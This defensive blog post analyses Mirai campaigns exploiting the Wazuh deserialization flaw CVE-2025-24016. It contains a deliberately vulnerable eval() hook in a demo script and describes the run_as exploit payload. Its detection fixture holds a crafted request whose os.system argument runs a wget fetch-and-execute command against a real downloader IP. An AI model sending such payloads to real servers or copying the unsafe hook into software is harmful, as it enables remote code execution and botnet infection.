How Mirai Botnets Weaponized Wazuh’s Critical Flaw

In early 2025 Wazuh, a widely deployed open-source SIEM/XDR platform, became a botnet target. A critical unsafe-deserialization flaw, CVE‑2025‑24016 (CVSS 9.9), was publicly disclosed on 10 February 2025. Within weeks, Mirai-based botnet operators repurposed the published proof-of-concept to gain remote code execution on unpatched servers. What looked like an obscure server-side bug became a two-front campaign: compromising the SIEM hosts themselves and using them to distribute DDoS malware.

Root of the Vulnerability: Unsafe Deserialization

The flaw lies in the Wazuh server's DistributedAPI (DAPI), which serializes requests and responses between cluster nodes as JSON. On the receiving side, JSON is turned back into Python objects by the as_wazuh_object hook in framework/wazuh/core/cluster/common.py. That hook treated any dictionary containing an __unhandled_exc__ key as a serialized exception and rebuilt it by calling eval() on the attacker-supplied __class__ string, with the __args__ list as arguments. Because the class name was never validated, any callable reachable from eval, such as os.system, could be named, so a crafted payload meant arbitrary code execution on the server. Anyone with valid API credentials could reach the vulnerable path, and in some configurations a compromised agent could too.

Wazuh’s Patch Path

Wazuh developers fixed the hook by dropping the eval() call and reconstructing the exception from literal data via ast.literal_eval, which accepts only Python literals (strings, numbers, lists, dicts and the like) and refuses calls, attribute access and imports. The fix shipped in version 4.9.1; the public advisory, with a proof-of-concept payload, was published in February 2025. Patch lag then did the rest: servers still running 4.4.0 through 4.9.0 were exposed to anyone who read the advisory.
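To make the root cause concrete, here is an added example, not Wazuh's own code: a deserializer hook with the eval()-based shape described above, next to an allowlist-based hardened hook that never evaluates wire data, plus a check of the ast.literal_eval property the fix relies on. The SAFE_EXCEPTIONS allowlist, the UnsafePayload class and the sample payloads are assumptions for the demo; the payloads name harmless callables (len, os.getpid), but the mechanism is exactly the one that runs a shell command.

```python
"""Added example: the eval()-based deserializer shape the article
describes, beside an allowlist-based hardened form. This is NOT Wazuh's
code; SAFE_EXCEPTIONS, UnsafePayload and the payloads are constructed."""
import ast
import json


class UnsafePayload(Exception):
    """Raised by the hardened hook when a payload cannot be trusted."""


# Hypothetical allowlist: exception types one node may legitimately
# propagate to another. Anything else is refused, never evaluated.
SAFE_EXCEPTIONS = {
    "ValueError": ValueError,
    "KeyError": KeyError,
    "TimeoutError": TimeoutError,
}


def as_wazuh_object_vulnerable(dct):
    """Pre-fix shape: the *sender* chooses the class name and eval()
    resolves it to any callable reachable from here, e.g. os.system."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        return eval(exc["__class__"])(*exc["__args__"])  # deliberately unsafe
    return dct


def as_wazuh_object_hardened(dct):
    """Rebuild only allowlisted exceptions from scalar literal args.
    No string from the wire is ever evaluated as code."""
    if "__unhandled_exc__" not in dct:
        return dct
    exc = dct["__unhandled_exc__"]
    cls = SAFE_EXCEPTIONS.get(exc.get("__class__"))
    if cls is None:
        raise UnsafePayload(f"unknown exception class {exc.get('__class__')!r}")
    args = exc.get("__args__", [])
    if not isinstance(args, list) or not all(
        isinstance(a, (str, int, float, bool, type(None))) for a in args
    ):
        raise UnsafePayload("exception args must be a list of scalar literals")
    return cls(*args)


def literal_eval_rejects(expr):
    """True if ast.literal_eval refuses `expr`: calls, attribute access and
    imports all raise, which is the property the 4.9.1 fix relies on."""
    try:
        ast.literal_eval(expr)
    except (ValueError, SyntaxError):
        return True
    return False


def deserialize(payload, hook):
    """Mimic the DAPI path: JSON text -> Python objects via an object_hook."""
    return json.loads(payload, object_hook=hook)


def hardened_refuses(payload):
    """True if the hardened hook raises UnsafePayload for `payload`."""
    try:
        deserialize(payload, as_wazuh_object_hardened)
    except UnsafePayload:
        return True
    return False


# Constructed payloads. The callables are harmless, but the mechanism is
# identical to naming os.system with a shell command in __args__.
RCE_SHAPED_PAYLOAD = json.dumps(
    {"__unhandled_exc__": {"__class__": "len", "__args__": [[1, 2, 3]]}}
)
IMPORT_PAYLOAD = json.dumps(
    {"__unhandled_exc__": {"__class__": "__import__('os').getpid", "__args__": []}}
)
LEGIT_EXC_PAYLOAD = json.dumps(
    {"__unhandled_exc__": {"__class__": "ValueError", "__args__": ["node timeout"]}}
)

if __name__ == "__main__":
    print("vulnerable, len payload    ->", deserialize(RCE_SHAPED_PAYLOAD, as_wazuh_object_vulnerable))
    print("vulnerable, import payload ->", deserialize(IMPORT_PAYLOAD, as_wazuh_object_vulnerable))
    print("hardened, legit payload    ->", repr(deserialize(LEGIT_EXC_PAYLOAD, as_wazuh_object_hardened)))
    print("hardened refuses len payload:", hardened_refuses(RCE_SHAPED_PAYLOAD))
    print("literal_eval rejects import expr:", literal_eval_rejects("__import__('os').getpid()"))
```

The vulnerable hook happily resolves `len` and `__import__('os').getpid` because eval() treats the class name as Python source. The hardened hook looks the name up in a fixed table and type-checks the arguments, so the only thing a sender can do is pick which known exception is raised.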

Mirai Redux: Campaign One – “LZRD Family”

By early March 2025, Akamai's honeypots began recording exploit attempts that mirrored the public PoC: a POST to /security/user/authenticate/run_as whose body smuggled shell commands through the __unhandled_exc__ payload. Those commands fetched and ran a downloader script, typically named w.sh, from 176.65.134.62; the script in turn pulled Mirai binaries built for several CPU architectures (ARM, MIPS, x86). This variant, dubbed "LZRD" after its console string "lzrd here", also surfaced with payloads named "morte", "neon", "vision" and "V3G4".

These bots behaved like classic Mirai: scanning for exposed IoT devices, logging in to those with weak or default credentials, and enrolling them as DDoS nodes. What set the campaign apart was its foothold: enterprise Wazuh servers, which sit inside corporate networks and typically have far more bandwidth than the home routers Mirai usually rides on.

Campaign Two – “Resbot” Strikes with Italian Flair

In early May 2025 a second wave appeared, again exploiting CVE‑2025‑24016 on Wazuh servers. Its structure resembled the LZRD campaign, but with different payload builds and loader scripts. The infrastructure hinted at an Italian-speaking operator or Italian targets: C2 domains such as gestisciweb.com and versioneonline.com. The payload, sometimes referred to as "resgod", prints "Resentual got you!" when executed.

Beyond CVE‑2025‑24016, this botnet also carried older exploits for consumer routers, including command injection against Huawei HG532, D‑Link, Realtek SDK and ZyXEL devices. A single foothold could therefore seed infections across very different environments, from servers to home gateways.

Timeline of Escalation

Date            Event
Feb 10, 2025    Wazuh publishes the security advisory for CVE‑2025‑24016 with a PoC payload (the fix had already shipped in 4.9.1)
Late Feb        PoC becomes publicly available via a GitHub vulnerabilities repository
Early Mar       First Mirai exploitation attempts mirroring the PoC hit global honeypots
Early May       Second campaign (Resbot, Italian-themed infrastructure) surfaces, targeting the same vulnerability
June 9–10       Akamai and other outlets publish both campaigns and their IoCs

Technical Deep Dive: How Exploits Work

  • Entry vector: a POST to /security/user/authenticate/run_as carrying HTTP Basic authorization, frequently for the wazuh-wui account with a default or leaked password.
  • Payload body: the JSON body contains a crafted __unhandled_exc__ object whose __class__ resolves to a shell-executing callable and whose __args__ carry a wget or curl one-liner that retrieves the downloader.
  • Stage 2 loader: the downloader script (w.sh) tries architecture-specific Mirai binaries in turn and executes whichever runs on the host.
  • Mirai execution: the infected server checks in with C2 infrastructure and joins the botnet's DDoS network.
  • Multi-target strategy: some loaders carry extra stages that attack routers via FTP, telnet or UPnP/SOAP endpoints, chaining several exploits in one campaign.

Infrastructure & IoCs

  • Downloader host: 176.65.134.62
  • C2 domains (LZRD): nuklearcnc.duckdns.org, cbot.galaxias.cc, neon.galaxias.cc, vision.galaxias.cc
  • Italian-themed C2 (Resbot): gestisciweb.com, versioneonline.com, 104.168.101.27:62627
  • Router CVEs targeted: CVE‑2023‑1389 (TP-Link Archer AX21), CVE‑2017‑17215 (Huawei HG532), CVE‑2017‑18368 (ZyXEL P660HN), Realtek SDK, UPnP SOAP injection
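The following is an added detection example, not code from Akamai or the Wazuh project, covering both the exploit chain in the deep dive and the indicators listed above. It flags POSTs to the run_as endpoint whose JSON body carries __unhandled_exc__ or a download tool, flags wazuh-wui Basic auth from anywhere but the dashboard, and matches outbound events against the article's IP and domain IoCs (subdomains included). The request records, event lines, trusted dashboard address 10.20.0.5 and placeholder credentials are constructed; the real Wazuh API log format is not reproduced.

```python
"""Added example (not Akamai's or Wazuh's code): flag the CVE-2025-24016
request shape and match events against the article's IoCs. Requests,
events and the trusted dashboard host are constructed for the demo."""
import base64
import json
import re

RUN_AS_PATH = "/security/user/authenticate/run_as"
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}\b")

# Indicators quoted in the article (LZRD and Resbot campaigns).
IOC_IPS = {"176.65.134.62", "104.168.101.27"}
IOC_DOMAINS = {
    "nuklearcnc.duckdns.org", "cbot.galaxias.cc", "neon.galaxias.cc",
    "vision.galaxias.cc", "gestisciweb.com", "versioneonline.com",
}

# Assumption: only the dashboard should call run_as as wazuh-wui.
TRUSTED_DASHBOARD_HOSTS = frozenset({"10.20.0.5"})


def basic_auth_user(header):
    """Username from an HTTP Basic header, or None if absent/undecodable."""
    if not header or not header.lower().startswith("basic "):
        return None
    try:
        creds = base64.b64decode(header.split(None, 1)[1]).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return creds.split(":", 1)[0]


def contains_key(obj, key):
    """Recursively search parsed JSON for a dict key at any depth."""
    if isinstance(obj, dict):
        return key in obj or any(contains_key(v, key) for v in obj.values())
    if isinstance(obj, list):
        return any(contains_key(v, key) for v in obj)
    return False


def inspect_request(req, trusted_sources=TRUSTED_DASHBOARD_HOSTS):
    """Reasons a run_as request looks like CVE-2025-24016 abuse ([] = clean)."""
    reasons = []
    if not (req["method"] == "POST" and req["path"].endswith(RUN_AS_PATH)):
        return reasons
    raw = req.get("body") or ""
    try:
        body = json.loads(raw or "{}")
    except ValueError:
        body = None
    if body is None:
        reasons.append("run_as body is not valid JSON")
    elif contains_key(body, "__unhandled_exc__"):
        reasons.append("run_as body carries __unhandled_exc__ (CVE-2025-24016 shape)")
    if DOWNLOADER_RE.search(raw):
        reasons.append("run_as body references a download tool (wget/curl/tftp)")
    if basic_auth_user(req.get("authorization")) == "wazuh-wui" and req["src"] not in trusted_sources:
        reasons.append(f"wazuh-wui Basic auth from untrusted source {req['src']}")
    return reasons


def match_iocs(lines):
    """(line_index, indicator) for every article IoC seen in the lines;
    subdomains of a listed C2 domain count as a hit on that domain."""
    hits = []
    for i, line in enumerate(lines):
        for ip in IPV4_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((i, ip))
        for host in HOST_RE.findall(line):
            host = host.lower()
            for dom in IOC_DOMAINS:
                if host == dom or host.endswith("." + dom):
                    hits.append((i, dom))
    return hits


def _basic(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed API requests: a normal call, the exploit shape, a legit dashboard run_as.
REQUESTS = [
    {"src": "10.20.0.5", "method": "GET", "path": "/agents",
     "authorization": "Bearer <jwt>", "body": ""},
    {"src": "203.0.113.7", "method": "POST", "path": RUN_AS_PATH,
     "authorization": _basic("wazuh-wui", "<password>"),
     "body": json.dumps({"__unhandled_exc__": {
         "__class__": "os.system",
         "__args__": ["cd /tmp; wget http://176.65.134.62/w.sh; sh w.sh"]}})},
    {"src": "10.20.0.5", "method": "POST", "path": RUN_AS_PATH,
     "authorization": _basic("wazuh-wui", "<password>"),
     "body": json.dumps({"username": "alice", "roles": ["analyst"]})},
]

# Constructed outbound events from Wazuh servers (not a real log format).
EVENTS = [
    "2025-03-04T10:12:01Z wazuh-srv01 outbound 10.20.0.15 -> 176.65.134.62:80 GET /w.sh",
    "2025-03-04T10:12:04Z wazuh-srv01 dns query nuklearcnc.duckdns.org A",
    "2025-03-04T10:13:00Z wazuh-srv01 outbound 10.20.0.15 -> 192.0.2.10:443 GET /api/health",
    "2025-05-06T08:41:12Z wazuh-srv02 dns query cdn.versioneonline.com A",
]

if __name__ == "__main__":
    for req in REQUESTS:
        print(req["method"], req["path"], "->", inspect_request(req) or ["clean"])
    for idx, ioc in match_iocs(EVENTS):
        print(f"IoC hit on event {idx}: {ioc}")
```

The body check is deliberately recursive: the vulnerable hook runs on every nested dictionary, so __unhandled_exc__ buried inside an otherwise normal auth_context object is just as dangerous as one at the top level. The IoC matcher is only as good as the list it is given; refresh it from Akamai's published indicators rather than treating the handful quoted here as complete.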

Why This Matters: A New Attack Vector

  1. SIEM server compromise – infecting Wazuh may allow adversaries to subvert monitoring while planting persistent backdoors.
  2. Payload versatility – payloads can transition from server to network layers by targeting routers and IoT devices.
  3. Rapid exploit adoption – active exploitation began within weeks of the PoC release, showing how quickly botnet operators fold new server-side bugs into existing tooling.
  4. Multi-chain exploitation – combining new and old vulnerabilities to diversify infection paths.
  5. Regional targeting – Resbot’s domain choices hint at geo-tailored strategy, perhaps to avoid detection or segmentation.

Recommendations for Prevention

  • Upgrade Wazuh to at least 4.9.1 immediately. Delaying exposes critical systems.
  • Tighten API controls:
    • Limit access to the Wazuh API (TCP 55000 by default) to internal subnets or via VPN; it should never face the internet
    • Rotate the default wazuh-wui and API passwords and enforce credential hygiene for every API account
    • Set API rate limits and alert on failed logins and on run_as calls from unexpected sources
  • Deploy IoC-based detection:
    • Use YARA/Snort rules from Akamai and other vendors
    • Monitor unusual download behavior pointing to C2 hosts
  • Audit your edge:
    • Make sure corporate routers, IoT devices, and UPnP endpoints aren’t reachable from the internet
    • Confirm robust firmware and patch management for all network devices
  • Penetration testing – simulate exploit chains to identify weak configurations before adversaries do

Real-World Response: Next Steps

  1. Conduct asset inventory to identify systems running Wazuh 4.4.0–4.9.0.
  2. Apply the 4.9.1 update across the board.
  3. Implement network segmentation and firewall rules so the API endpoint (port 55000) is reachable only from the dashboard and administrative hosts.
  4. Install detection rules for known IoCs — domains, IPs, script indicators.
  5. Check and patch network devices vulnerable to router-focused Mirai payloads.
  6. Set automated monitoring and alerting on script downloads to /tmp, unexpected outbound connections from the Wazuh server, sudden service restarts, or unusual CPU usage.
  7. Schedule regular threat simulation exercises, including deserialization-based exploit testing.
  8. Share detection routines internally and with external responders for collective defense.

Conclusion: From SIEM to Battlefield

Wazuh’s flaw turned from theoretical risk to active battlefield within weeks, fueled by Mirai’s adaptability. The campaigns targeting Wazuh illustrate a powerful adaptation: using enterprise security tools themselves as stealthy injection points for malware. The emerging Italian-centric Resbot campaign underscores how adversaries adapt regionally—not just technologically.

The key lesson? Patching and layered defenses aren’t optional—they’re urgent. Organizations must treat their visibility infrastructure (SIEMs, XDR, logging platforms) as high-value attack surfaces. Keeping those up to date, locked down, and monitored is as essential as locking down the routers and IoT endpoints they oversee.


I’m Rinzl3r

Hello! I’m Matthew, an experienced engineer at Decian, a leading Managed Service Provider (MSP) dedicated to revolutionizing IT solutions for businesses. With a passion for technology and a wealth of experience in the MSP industry, I’ve embarked on a journey to demystify the world of managed services through this blog.

My career at Decian has been a journey of constant learning and growth. Over the years, I’ve honed my skills in various aspects of IT management, from network security and cloud services to data analytics and cybersecurity. Working in an environment that fosters innovation and customer-focused solutions, I’ve had the privilege of contributing to numerous projects that have helped businesses optimize their IT strategies and enhance operational efficiency.

The inspiration to start this blog came from my interactions with business owners and clients who often expressed a need for clearer understanding and guidance in working with MSPs. Whether it’s navigating the complexities of digital transformation, ensuring cybersecurity, or leveraging technology for business growth, I realized that there’s a wealth of knowledge to be shared.

Through this blog, I aim to bridge the gap between MSPs and their clients. My goal is to provide insights, tips, and practical advice that can help business owners make informed decisions about their IT needs and how best to collaborate with an MSP like Decian. From explaining basic concepts to exploring advanced IT solutions, I strive to make this space a valuable resource for both seasoned professionals and those new to the world of managed services.

Join me on this informative journey, as we explore the dynamic and ever-evolving world of MSPs. Whether you’re an MSP client, a business owner, or just curious about the role of technology in business today, I hope to make this blog your go-to source for all things MSP.

Welcome to the blog, and let’s unravel the complexities of managed IT services together!
